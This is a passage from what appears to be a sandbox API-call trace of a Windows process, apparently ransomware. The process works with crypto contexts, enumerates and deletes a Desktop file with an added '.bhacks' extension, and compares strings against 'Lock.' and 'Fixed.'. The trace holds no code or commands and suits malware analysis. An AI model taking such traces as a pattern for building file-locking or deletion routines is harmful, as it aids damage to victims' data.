lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0107.064] CryptReleaseContext (hProv=0x9bef78, dwFlags=0x0) returned 1 [0107.064] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.064] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.064] FreeLibrary (hLibModule=0x76390000) returned 1 [0107.064] CloseHandle (hObject=0x44c) returned 1 [0107.066] CloseHandle (hObject=0x458) returned 1 [0107.069] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0107.069] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0107.069] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/WLViPvkU.mp4.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4.bhacks", lpFilePart=0x8cedf4*="WLViPvkU.mp4.bhacks") returned 0x2b [0107.069] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\wlvipvku.mp4.bhacks")) returned 0x20 [0107.069] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2559e9dc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2559e9dc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x256a9b70, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa120, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="WLViPvkU.mp4.bhacks", cAlternateFileName="WLVIPV~1.BHA")) returned 0x9a3b80 [0107.069] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\wlvipvku.mp4.bhacks")) returned 1 [0107.070] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2559e9dc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2559e9dc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x256a9b70, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa120, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="WLViPvkU.mp4.bhacks", cAlternateFileName="WLVIPV~1.BHA")) returned 0 [0107.071] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0107.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75b28 | out: hHeap=0x2af0000) returned 1 [0107.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0107.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0107.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0107.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0107.071] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0107.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0107.071] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0107.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0107.071] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0107.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63e0 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75ba0 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63e0 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0107.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0107.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0107.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5f6c0 [0107.073] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/WLViPvkU.mp4.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4.bhacks", lpFilePart=0x8cf650*="WLViPvkU.mp4.bhacks") returned 0x2b [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0107.073] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WLViPvkU.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\wlvipvku.mp4.bhacks")) returned 0xffffffff [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75ba0 | out: hHeap=0x2af0000) returned 1 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0107.073] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0107.073] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0107.073] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0107.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0107.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0107.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0107.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0107.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0107.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0107.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0107.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0107.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0107.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0107.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0107.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yi TyUTEx1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i TyUTEx1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" TyUTEx1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TyUTEx1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yUTEx1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTEx1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TEx1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ex1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dVRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VRHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0107.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RHalW", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0107.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0107.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0107.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0107.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0107.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0107.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0107.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0107.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0107.074] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0107.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0107.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0107.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0107.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0107.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0107.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0107.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0107.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0107.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a30 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yi TyUTEx1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i TyUTEx1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" TyUTEx1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TyUTEx1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yUTEx1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTEx1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TEx1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ex1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dVRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0107.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VRHalW", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0107.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6220 [0107.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0107.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6220 | out: hHeap=0x2af0000) returned 1 [0107.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0107.076] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0107.076] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0107.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0107.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0107.076] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0107.077] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6370 [0107.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0107.077] HeapFree (in: hHeap=0x2af0000, 